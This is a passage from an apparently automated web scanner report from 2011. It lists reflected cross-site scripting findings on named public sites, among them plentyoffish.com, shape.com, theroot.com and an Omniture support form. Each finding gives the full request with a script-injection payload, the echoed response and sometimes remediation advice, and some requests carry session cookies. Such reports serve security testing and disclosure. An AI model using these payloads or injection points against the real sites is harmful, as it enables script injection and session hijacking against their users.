GET /needs_test.aspx?71843"><script>alert(1)</script>d3bff3c6b0f=1 HTTP/1.1 Host: www.plentyoffish.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmx=9489908.00012890560422417014:1:0-1-1-0; my_ipcountry=1; __utmxx=9489908.00012890560422417014:3738630:2592000; __utmz=9489908.1296523584.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmx_k_210735692=1; __utma=9489908.1831818404.1296523584.1296523584.1296523584.1; ft=Monday, January 31, 2011 5:25:37 PM; __utmc=9489908; __utmb=9489908.5.10.1296523584; ASP.NET_SessionId=enhftrh2rwh40ylxbcdqkhlw;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 01 Feb 2011 01:30:39 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 4.0.30319 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 6131
<META name="description" content="A Free Relationship test that measures your needs in a relationship."> <meta name="KEYW ...[SNIP]... <form action="?SID=enhftrh2rwh40ylxbcdqkhlw&71843"><script>alert(1)</script>d3bff3c6b0f=1" method="post" name="frmLogin" > ...[SNIP]...
1.469. http://www.plentyoffish.com/poftest.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.plentyoffish.com
Path:
/poftest.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3702a"><script>alert(1)</script>f50ea53eb4b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /poftest.aspx?3702a"><script>alert(1)</script>f50ea53eb4b=1 HTTP/1.1 Host: www.plentyoffish.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmx=9489908.00012890560422417014:1:0-1-1-0; my_ipcountry=1; __utmxx=9489908.00012890560422417014:3738630:2592000; __utmz=9489908.1296523584.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmx_k_210735692=1; __utma=9489908.1831818404.1296523584.1296523584.1296523584.1; ft=Monday, January 31, 2011 5:25:37 PM; __utmc=9489908; __utmb=9489908.5.10.1296523584; ASP.NET_SessionId=enhftrh2rwh40ylxbcdqkhlw;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 01 Feb 2011 01:30:39 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 4.0.30319 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 10025
<META name="description" content="A Free Personality test that measures relationship compatibility for singles."> ...[SNIP]... <form action="?SID=enhftrh2rwh40ylxbcdqkhlw&3702a"><script>alert(1)</script>f50ea53eb4b=1" method="post" name="frmLogin" > ...[SNIP]...
1.470. http://www.plentyoffish.com/seriousintro.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.plentyoffish.com
Path:
/seriousintro.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f319"><script>alert(1)</script>df4edccc94a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /seriousintro.aspx?8f319"><script>alert(1)</script>df4edccc94a=1 HTTP/1.1 Host: www.plentyoffish.com Proxy-Connection: keep-alive Referer: http://www.plentyoffish.com/register.aspx Cache-Control: max-age=0 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASP.NET_SessionId=enhftrh2rwh40ylxbcdqkhlw; ft=Monday, January 31, 2011 5:25:37 PM; my_ipcountry=1; __utmx=9489908.00012890560422417014:1:0-1-1-0; __utmxx=9489908.00012890560422417014:3738426:2592000; __utmz=9489908.1296523584.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=9489908.1831818404.1296523584.1296523584.1296523584.1; __utmc=9489908; __utmb=9489908.4.10.1296523584
Response
HTTP/1.1 200 OK Cache-Control: private Date: Tue, 01 Feb 2011 01:30:03 GMT Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 4.0.30319 Vary: Accept-Encoding Content-Length: 10076
<html><title>Plentyoffish.com - Changing The Online Dating Industry</title>
<html><head><title>Plentyoffish.com 100% Free Online Dating Service for singles</title> <META HTTP-EQUIV="Conten ...[SNIP]... <form action="?SID=enhftrh2rwh40ylxbcdqkhlw&8f319"><script>alert(1)</script>df4edccc94a=1" method="post" name="frmLogin" > ...[SNIP]...
1.471. http://www.ratestogo.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ratestogo.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4ed69'-alert(1)-'57cc6386674 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?4ed69'-alert(1)-'57cc6386674=1 HTTP/1.1 Host: www.ratestogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 16:18:54 GMT Server: Microsoft-IIS/6.0 P3P: CP="NOI DEVa TAIa OUR BUS UNI" X-Powered-By: ASP.NET pragma: no-cache cache-control: private Content-Length: 36741 Content-Type: text/html; Charset=windows-1252 Expires: Tue, 01 Feb 2011 16:18:52 GMT Set-Cookie: %7CSearchEng%7C=%7C%7C%7C%7C2011%2D2%2D4%7C2011%2D2%2D5%7C; path=/ Set-Cookie: ASPSESSIONIDCCCQTTTR=MOHDHHOALHAINFEGIBOFLLGC; path=/ Cache-control: no-cache
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 12dbe'-alert(1)-'e5f670c0dc0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /search/xss12dbe'-alert(1)-'e5f670c0dc0/ HTTP/1.1 Host: www.scmagazineus.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 35894 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=tqppn045jb4esavsbkl3isfg; path=/; HttpOnly From: Web2-VM Date: Thu, 03 Feb 2011 04:05:34 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7f75c<script>alert(1)</script>f7919591e3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /workouts7f75c<script>alert(1)</script>f7919591e3/articles/blood_sugar.html HTTP/1.1 Host: www.shape.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Tue, 01 Feb 2011 14:34:59 GMT Server: Apache Vary: Accept-Encoding Cache-Control: max-age=900 Expires: X-Server-Name: (null) ETag: "1296570899" Last-Modified: Tue, 01 Feb 2011 14:34:59 +0000 X-Powered-By: PHP/5.2.13 Via: HTTP/1.1 cdn.shape.com (MII-WSD/1.4) X-Pb-Mii: Powered by Mirror Image Internet Content-Type: text/html; charset=utf-8 Via: 1.1 mdw107113 (MII-APC/1.6) Connection: close Content-Length: 27263
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:meebo="http://www.meebo.com" ...[SNIP]... <br /> workouts7f75c<script>alert(1)</script>f7919591e3/articles/blood-sugar.html </div> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 99e23<script>alert(1)</script>d36e3d1a30d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /workouts/articles99e23<script>alert(1)</script>d36e3d1a30d/blood_sugar.html HTTP/1.1 Host: www.shape.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Tue, 01 Feb 2011 14:35:18 GMT Server: Apache Vary: Accept-Encoding Cache-Control: max-age=900 Expires: X-Server-Name: (null) ETag: "1296570918" Last-Modified: Tue, 01 Feb 2011 14:35:18 +0000 X-Powered-By: PHP/5.2.9 Via: HTTP/1.1 cdn.shape.com (MII-WSD/1.4) X-Pb-Mii: Powered by Mirror Image Internet Content-Type: text/html; charset=utf-8 Via: 1.1 mdw107113 (MII-APC/1.6) Connection: close Content-Length: 27265
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:meebo="http://www.meebo.com" ...[SNIP]... <br /> workouts/articles99e23<script>alert(1)</script>d36e3d1a30d/blood-sugar.html </div> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 1a635<script>alert(1)</script>5dadd1e4bd0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /workouts/articles/blood_sugar.html1a635<script>alert(1)</script>5dadd1e4bd0 HTTP/1.1 Host: www.shape.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Tue, 01 Feb 2011 14:35:45 GMT Server: Apache Vary: Accept-Encoding Cache-Control: max-age=900 Expires: X-Server-Name: (null) ETag: "1296570945" Last-Modified: Tue, 01 Feb 2011 14:35:45 +0000 X-Powered-By: PHP/5.2.9 Via: HTTP/1.1 cdn.shape.com (MII-WSD/1.4) X-Pb-Mii: Powered by Mirror Image Internet Content-Type: text/html; charset=utf-8 Via: 1.1 mdw107109 (MII-APC/1.6) Connection: close Content-Length: 27265
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:meebo="http://www.meebo.com" ...[SNIP]... <br /> workouts/articles/blood-sugar.html1a635<script>alert(1)</script>5dadd1e4bd0 </div> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6d774<script>alert(1)</script>9b61c9a28ac was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /workouts6d774<script>alert(1)</script>9b61c9a28ac/articles/workout_schedule.html HTTP/1.1 Host: www.shape.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Tue, 01 Feb 2011 14:35:12 GMT Server: Apache Vary: Accept-Encoding Cache-Control: max-age=900 Expires: X-Server-Name: (null) ETag: "1296570912" Last-Modified: Tue, 01 Feb 2011 14:35:12 +0000 X-Powered-By: PHP/5.2.9 Via: HTTP/1.1 cdn.shape.com (MII-WSD/1.4) X-Pb-Mii: Powered by Mirror Image Internet Content-Type: text/html; charset=utf-8 Via: 1.1 mdw107113 (MII-APC/1.6) Connection: close Content-Length: 27275
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:meebo="http://www.meebo.com" ...[SNIP]... <br /> workouts6d774<script>alert(1)</script>9b61c9a28ac/articles/workout-schedule.html </div> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload cb792<script>alert(1)</script>6f82f8506a9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /workouts/articlescb792<script>alert(1)</script>6f82f8506a9/workout_schedule.html HTTP/1.1 Host: www.shape.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Tue, 01 Feb 2011 14:35:27 GMT Server: Apache Vary: Accept-Encoding Cache-Control: max-age=900 Expires: X-Server-Name: (null) ETag: "1296570927" Last-Modified: Tue, 01 Feb 2011 14:35:27 +0000 X-Powered-By: PHP/5.2.13 Via: HTTP/1.1 cdn.shape.com (MII-WSD/1.4) X-Pb-Mii: Powered by Mirror Image Internet Content-Type: text/html; charset=utf-8 Via: 1.1 mdw107102 (MII-APC/1.6) Connection: close Content-Length: 27275
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:meebo="http://www.meebo.com" ...[SNIP]... <br /> workouts/articlescb792<script>alert(1)</script>6f82f8506a9/workout-schedule.html </div> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c01ef<script>alert(1)</script>abad6a1bc51 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /workouts/articles/workout_schedule.htmlc01ef<script>alert(1)</script>abad6a1bc51 HTTP/1.1 Host: www.shape.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Tue, 01 Feb 2011 14:35:44 GMT Server: Apache Vary: Accept-Encoding Cache-Control: max-age=900 Expires: X-Server-Name: (null) ETag: "1296570944" Last-Modified: Tue, 01 Feb 2011 14:35:44 +0000 X-Powered-By: PHP/5.2.13 Via: HTTP/1.1 cdn.shape.com (MII-WSD/1.4) X-Pb-Mii: Powered by Mirror Image Internet Content-Type: text/html; charset=utf-8 Via: 1.1 mdw107109 (MII-APC/1.6) Connection: close Content-Length: 27275
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:meebo="http://www.meebo.com" ...[SNIP]... <br /> workouts/articles/workout-schedule.htmlc01ef<script>alert(1)</script>abad6a1bc51 </div> ...[SNIP]...
The value of the account request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21416"><script>alert(1)</script>426ca979e1e was submitted in the account parameter. This input was echoed as 21416\"><script>alert(1)</script>426ca979e1e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /contact/form_support.htm?first_name=&last_name=&email=&account=21416"><script>alert(1)</script>426ca979e1e HTTP/1.1 Host: www.sitesearch.omniture.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 04:05:22 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 DAV/2 PHP/5.3.3 X-Powered-By: PHP/5.3.3 Content-Length: 4526 Connection: close Content-Type: text/html
The value of the email request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61d89"><script>alert(1)</script>4742146ad85 was submitted in the email parameter. This input was echoed as 61d89\"><script>alert(1)</script>4742146ad85 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /contact/form_support.htm?first_name=&last_name=&email=61d89"><script>alert(1)</script>4742146ad85&account= HTTP/1.1 Host: www.sitesearch.omniture.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 04:05:21 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 DAV/2 PHP/5.3.3 X-Powered-By: PHP/5.3.3 Content-Length: 4526 Connection: close Content-Type: text/html
The value of the first_name request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72a0e"><script>alert(1)</script>9736852f4d7 was submitted in the first_name parameter. This input was echoed as 72a0e\"><script>alert(1)</script>9736852f4d7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /contact/form_support.htm?first_name=72a0e"><script>alert(1)</script>9736852f4d7&last_name=&email=&account= HTTP/1.1 Host: www.sitesearch.omniture.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 04:05:18 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 DAV/2 PHP/5.3.3 X-Powered-By: PHP/5.3.3 Content-Length: 4526 Connection: close Content-Type: text/html
The value of the last_name request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 399d0"><script>alert(1)</script>6520bebc9e8 was submitted in the last_name parameter. This input was echoed as 399d0\"><script>alert(1)</script>6520bebc9e8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /contact/form_support.htm?first_name=&last_name=399d0"><script>alert(1)</script>6520bebc9e8&email=&account= HTTP/1.1 Host: www.sitesearch.omniture.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 04:05:20 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 DAV/2 PHP/5.3.3 X-Powered-By: PHP/5.3.3 Content-Length: 4526 Connection: close Content-Type: text/html
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c92f"><script>alert(1)</script>bd6fb384a18 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /multimedia6c92f"><script>alert(1)</script>bd6fb384a18/50-years-black-history?gt1=38002 HTTP/1.1 Host: www.theroot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.63 (Unix) Last-Modified: Wed, 02 Feb 2011 16:17:57 GMT Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Wed, 02 Feb 2011 16:17:57 GMT Date: Wed, 02 Feb 2011 16:17:57 GMT Content-Length: 15118 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr"> <meta name=" ...[SNIP]... <meta property="og:url" content="http://www.theroot.com/multimedia6c92f"><script>alert(1)</script>bd6fb384a18/50-years-black-history?gt1=38002"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98209"><script>alert(1)</script>e0674eb095a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /multimedia/50-years-black-history98209"><script>alert(1)</script>e0674eb095a?gt1=38002 HTTP/1.1 Host: www.theroot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache/2.0.63 (Unix) Last-Modified: Wed, 02 Feb 2011 16:18:01 GMT Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Wed, 02 Feb 2011 16:18:02 GMT Date: Wed, 02 Feb 2011 16:18:02 GMT Connection: close Connection: Transfer-Encoding Content-Length: 50675
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr"> <meta name=" ...[SNIP]... <meta property="og:url" content="http://www.theroot.com/multimedia/50-years-black-history98209"><script>alert(1)</script>e0674eb095a?gt1=38002"/> ...[SNIP]...
The value of the gt1 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d156"><script>alert(1)</script>bf469ccbd18 was submitted in the gt1 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /multimedia/50-years-black-history?gt1=380029d156"><script>alert(1)</script>bf469ccbd18 HTTP/1.1 Host: www.theroot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache/2.0.63 (Unix) Last-Modified: Wed, 02 Feb 2011 16:17:50 GMT Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Wed, 02 Feb 2011 16:17:51 GMT Date: Wed, 02 Feb 2011 16:17:51 GMT Connection: close Connection: Transfer-Encoding Content-Length: 96303
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr"> <meta name=" ...[SNIP]... <meta property="og:url" content="http://www.theroot.com/multimedia/50-years-black-history?gt1=380029d156"><script>alert(1)</script>bf469ccbd18"/> ...[SNIP]...
1.486. http://www.theroot.com/multimedia/50-years-black-history [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.theroot.com
Path:
/multimedia/50-years-black-history
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b633c"><script>alert(1)</script>497fa5bdff4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /multimedia/50-years-black-history?gt1=38002&b633c"><script>alert(1)</script>497fa5bdff4=1 HTTP/1.1 Host: www.theroot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache/2.0.63 (Unix) Last-Modified: Wed, 02 Feb 2011 16:17:54 GMT Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Wed, 02 Feb 2011 16:17:56 GMT Date: Wed, 02 Feb 2011 16:17:56 GMT Connection: close Connection: Transfer-Encoding Content-Length: 96334
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr"> <meta name=" ...[SNIP]... <meta property="og:url" content="http://www.theroot.com/multimedia/50-years-black-history?gt1=38002&b633c"><script>alert(1)</script>497fa5bdff4=1"/> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2bdb"><script>alert(1)</script>5626f52969 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /viewsb2bdb"><script>alert(1)</script>5626f52969/2011/young-futurists?gt1=38002 HTTP/1.1 Host: www.theroot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.63 (Unix) Last-Modified: Wed, 02 Feb 2011 16:17:57 GMT Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Wed, 02 Feb 2011 16:17:57 GMT Date: Wed, 02 Feb 2011 16:17:57 GMT Content-Length: 15066 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr"> <meta name=" ...[SNIP]... <meta property="og:url" content="http://www.theroot.com/viewsb2bdb"><script>alert(1)</script>5626f52969/2011/young-futurists?gt1=38002"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e1745"%3bfde0c798c36 was submitted in the REST URL parameter 2. This input was echoed as e1745";fde0c798c36 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /views/2011e1745"%3bfde0c798c36/young-futurists?gt1=38002 HTTP/1.1 Host: www.theroot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache/2.0.63 (Unix) Last-Modified: Wed, 02 Feb 2011 16:18:03 GMT Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Wed, 02 Feb 2011 16:18:05 GMT Date: Wed, 02 Feb 2011 16:18:05 GMT Connection: close Connection: Transfer-Encoding Content-Length: 49473
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15823"><script>alert(1)</script>9152561effe was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /views/201115823"><script>alert(1)</script>9152561effe/young-futurists?gt1=38002 HTTP/1.1 Host: www.theroot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache/2.0.63 (Unix) Last-Modified: Wed, 02 Feb 2011 16:17:59 GMT Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Wed, 02 Feb 2011 16:18:01 GMT Date: Wed, 02 Feb 2011 16:18:01 GMT Connection: close Connection: Transfer-Encoding Content-Length: 49685
